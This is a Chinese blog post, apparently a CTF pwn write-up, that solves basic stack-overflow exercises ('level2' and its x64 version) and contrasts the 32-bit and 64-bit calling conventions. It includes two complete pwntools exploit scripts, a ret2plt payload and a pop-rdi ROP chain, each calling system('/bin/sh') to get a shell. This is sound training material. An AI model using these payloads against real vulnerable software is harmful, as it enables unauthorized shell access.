栈溢出基础练习题——3 (内有32和64位区别的对比)

已于 2022-07-07 10:36:17 修改
阅读量310 收藏
点赞数
分类专栏: CTF训练 PWN 文章标签: PWN linux
于 2022-07-07 09:47:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696518/article/details/125652545
版权
CTF训练 同时被 2 个专栏收录
46 篇文章 15 订阅
订阅专栏
PWN
37 篇文章 3 订阅
订阅专栏

所有练习题:https://blog.csdn.net/qq_41696518/article/details/125646549
本题:pwn2 --> level2
先checksec一下,32位,开启了栈不可执行,自己构造shellcode指定不行,放入ida反编译一下
在这里插入图片描述
存在漏洞函数,不存在后门函数,但调用了system函数,这时则可以利用system的plt表掉system函数,因此只需要找到system的参数即可,Shift+F12,发现还存在/bin/sh字符串
在这里插入图片描述
那这题目就白给了,攻击函数:

from pwn import *
io = process("./level2")
elf = ELF("./level2")
bin_sh = 0x0804A024
system = elf.plt["system"]
io.recv()
payload = b'A'*(0x88+4) + p32(system) + b'A'*4 + p32(bin_sh)
io.sendline(payload)
io.interactive()

那如果是64位下的呢?有什么区别
x86:

  • 使用栈传递参数
  • 使用eax存返回值
    在这里插入图片描述

注意x86参数是倒序存入栈的
amd64:

  • 前6个参数依次存放于rdi,rsi,rdx,rcx,r8,r9寄存器中
  • 后7个参数存放于栈中
    在这里插入图片描述

注意寄存器是顺着放入,当存入栈时也是逆序放入,因为栈先进后出

这题也有x64版本:pwn2_x64 --> level2_x64
exp.py:

from pwn import *
io = process("./level2_x64")
elf = ELF("./level2_x64")
system_plt = elf.plt["system"]
bin_sh = next(elf.search(b"/bin/sh"))
pop_rdi_ret = 0x00000000004006b3
# pop_rdi_ret 可由 ROPgadget --binary level_x86 --only "pop|ret" | grep rdi  得到
payload = b'A'*(0x80+8) + p64(pop_rdi_ret) + p64(bin_sh) + p64(system_plt)
io.recv()
io.sendline(payload)
io.interactive()
Mokapeng
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
【漏洞初探】从最基础程序入手实战栈溢出
nullptr_zhu的博客
09-17 84
从最基础栈溢出的程序入手实战,通过借鉴大佬的博文完成了人生中第一个漏洞攻击。本文详解了大佬博文的每一步,希望能对大家有所帮助。
pwn栈溢出10道练习题有writeup
01-04
pwn栈溢出练习题目,每都有writeup.
pwn栈溢出基础练习题——1
qq_41696518的博客
07-06 439
pwn练习题
栈溢出基础练习题——5(字符串漏洞)
qq_41696518的博客
07-11 197
pwn 字符串漏洞练习题
pwn栈溢出基础练习题——2
qq_41696518的博客
07-06 308
pwn栈溢出练习,所有目在练习题——1中
菜鸟PWN手进阶之栈溢出基础
re1wn
01-03 6839
菜鸟PWN手进阶之栈溢出基础
单片机原理及应用——基于Proteus和Keil_C林立版课后习答案.docx
09-23
PSW.7 是进/借位标志 CY,PSW.6 是辅助进位标志 AC,PSW.5 和 PSW.1 是用户标志位 F0 和 F1,PSW.4 和 PSW.3 是工作寄存器选择控制位 RS1 和 RS0,PSW.2 是溢出标志位 OV,PSW.0 是奇偶标志位 P。 8. 时钟周期、...
单片机原理及应用——基于Proteus和KeilC林立版课后习答案.pdf
01-24
PSW.4、PSW.3:工作寄存器选择控制位RS1和RS0,00至11分别选择四组工作之一作为当前工作寄存器PSW.2:溢出标志位OV,有符号数加、减运算结果有溢出或乘除上结果异常(乘法运算结果大于255即乘积在BA中,或除法运算...
单片机原理及应用-基于Proteus和Keil-C林立版课后习答案.docx
11-30
"单片机原理及应用-基于Proteus和Keil-C林立版课后习答案" 以下是根据给定文件信息生成的知识点: 单片机结构及原理 * MCS-51 单片机内部由控制器、运算器、存储器、定时器/计数器、中断系统、输入输出接口等...
栈溢出基础练习题——4(写有64和32位两种攻击方式)
qq_41696518的博客
07-08 437
pwn 栈溢出目(中等)
CTF(Pwn)32位文件 和 64 文件 的 差异
半岛铁盒的博客
03-23 1426
一. 地址方面字节上的差异 32位是cpu一次处理的位数,即32位4字节,相当于地址的宽度,即sizeof(*p); 虚拟地址大小为4G,即有2的32次方个地址,从32个0到32个1个地址; ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210323094254825.png) 64位是cpu一次处理的位数,即64位8字节,相当于地址的宽度,即sizeof(*p); 虚拟地址大小为128G,即有2的64次方个地址,从64个0到64个1个地址; 在写Exp
PWN入门(5)32位程序与64位程序和构造ROP链
Ba1_Ma0的博客
09-12 1689
pwn"这个词的源起以及它被广泛地普遍使用的原因,源自于魔兽争霸某段讯息上设计师打字时拼错而造成的,原先的字词应该是"own"这个字,因为 ‘p’ 与 ‘o’ 在标准英文键盘上的位置是相邻的,PWN 也是一个黑客语法的俚语词,是指攻破设备或者系统。发音类似"砰”,对黑客而言,这就是成功实施黑客攻击的声音,而在ctf比赛里,pwn是对二进制漏洞的利用。
PWN入门
247533的博客
02-19 643
pwn exp
pwn》ret2libc2—x64简答例+脚本加解析
Aiyflwoers的博客
03-28 706
目地址:链接: https://pan.baidu.com/s/1isG2u-fpihbPt_Lumd4q5A?pwd=r9vn 提取码:r9vn 脚本展示: from pwn import* p=process('./babyrop') context.log_level='debug' gdb.attach(p) elf=ELF("./babyrop") libc=ELF("/lib/x86_64-linux-gnu/libc.so.6") padding=0x28 pop_rdi_ret_addr=
夏令营第二周pwn的level-x64总结
MIGENGKING的博客
07-26 349
今天我来总结一下pwn的level2_x64: 我们直接把目放进ubuntu虚拟机查看目: 发现目的arch模块是64位的;NX保护模式开启,所无法构建shellcode拿到shell/ 接下把文件放进IDAx64分析: ...
CTF PWN [XMAN]level2(x64)
qq_41743240的博客
04-08 395
CTF PWN [XMAN]level2(x64) 目地址 首先进行checksec保护机制的查询 发现只开了NX,所以不能利用shellcode方式获取shell,这里采用ROP方式获取shell IDA反编译查看伪源码 程序非常简单,两个函数 main: vulnerable_function: 在vulnerable_function有个问,buf申请空间为0x80字节,然而可以读...
CTF-PWN-level2(x64)(Jarvis OJ)
SuperGate的博客
02-15 498
这道和level2的32位版本的漏洞一样,不过32位程序函数的参数是压在栈中的,而64位程序的前6个参数是存在寄存器中的,第7个开始才压入栈中。 由于我们的目的是将system函数的参数改为/bin/sh,所以我们考虑用pop edi ret 语句将字符串赋值给edi。 同样的,程序中hint存入了/bin/sh,我们直接使用即可。 system函数的地址也很容易获得,剩下的就是pop e...
pwn学习笔记(一)(32位64位栈溢出
weixin_43742794的博客
08-05 2421
32位 32位的栈帧是这样的 栈溢出基本思路是覆盖掉返回地址和参数,执行system()函数从而/bin/sh拿到flag 64位 64位的栈帧也是这样的 但是在 Linux 上,前六个参数通过 RDI 、 RSI 、 RDX 、 RCX 、 R8 和 R9 传递; 而在 Windows 中,前四个参数通过 RCX 、 RDX 、 R8 和 R9 来传递 而第七个(windows下第五个)参数才p...
PWN基础知识及基础栈溢出手法
山高路远
04-12 3951
一、pwntools常用函数 函数 用途 send(data) 发送数据(字符串形式发送) sendline(data) 发送一行数据,默认在行尾加 \n(字符串形式发送) recv(numb=1096,timeout=default) 接收指定字节数的数据 buf = p.recvuntil(“\n”, drop=True) 直到接收到\n为止,drop=True表示丢弃\n,buf为接收到的输出但不包括丢弃的\n recvrepeat(timeout=default) 接
linunx缓冲区溢出实验在64位32位操作系统上实现有区别
最新发布
06-11
Linux系统中,32位64位操作系统的缓冲区溢出实验实现上存在一些区别,主要有以下几点: 1. 编译器的差异:32位64位操作系统使用的编译器不同,因此针对不同的操作系统需要使用不同的编译器进行编译。对于同一段代码,在32位64位编译器下生成的机器指令可能不同。 2. 内存地址的长度:64位操作系统的内存地址长度比32位操作系统长,因此在64位系统上,可以使用更大的内存空间。这也会影响缓冲区溢出实验的实现方式。 3. 操作系统的差异:不同的操作系统可能有不同的内存分配和保护机制,这也会影响缓冲区溢出实验的实现方式。 总之,虽然32位64位操作系统的缓冲区溢出实验实现上存在一些差异,但是这些差异并不会对实验的基本原理和流程产生影响。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值